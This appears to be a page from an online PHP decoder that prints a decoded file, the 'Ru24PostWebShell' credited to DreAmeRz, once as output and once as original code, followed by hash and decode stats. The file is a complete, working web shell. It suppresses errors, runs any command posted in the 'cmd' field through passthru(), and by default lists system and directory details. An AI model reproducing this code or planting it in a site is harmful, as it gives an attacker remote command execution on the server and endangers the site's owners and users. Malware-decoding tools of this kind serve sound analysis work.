Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* Ru24PostWebShell Writed by DreAmeRz http://www.ru24-team.net */ error_rep..

Decoded Output download

<?php 
/* 
Ru24PostWebShell 
Writed by DreAmeRz 
 
http://www.ru24-team.net 
*/ 
error_reporting(0); 
$function=passthru; // system, exec, cmd 
echo "<html> 
<head> 
<title>Ru24PostWebShell - ".$_POST['cmd']."</title> 
<meta http-equiv='pragma' content='no-cache'> 
</head><body>"; 
echo "<form method=post>"; 
echo "<input type=text name=cmd size=85>"; 
echo "</form>"; 
echo "<pre>"; 
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; } 
echo "".$function($_POST['cmd'])."</pre></body></html>"; 
 
 
?>

Did this file decode correctly?

Original Code

<?php
/*
Ru24PostWebShell
Writed by DreAmeRz

http://www.ru24-team.net
*/
error_reporting(0);
$function=passthru; // system, exec, cmd
echo "<html>
<head>
<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
<meta http-equiv='pragma' content='no-cache'>
</head><body>";
echo "<form method=post>";
echo "<input type=text name=cmd size=85>";
echo "</form>";
echo "<pre>";
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
echo "".$function($_POST['cmd'])."</pre></body></html>";


?>

Function Calls

error_reporting 1

Variables

None

Stats

MD5 43ac0b9be2088823787f02aebbfc758b
Eval Count 0
Decode Time 39 ms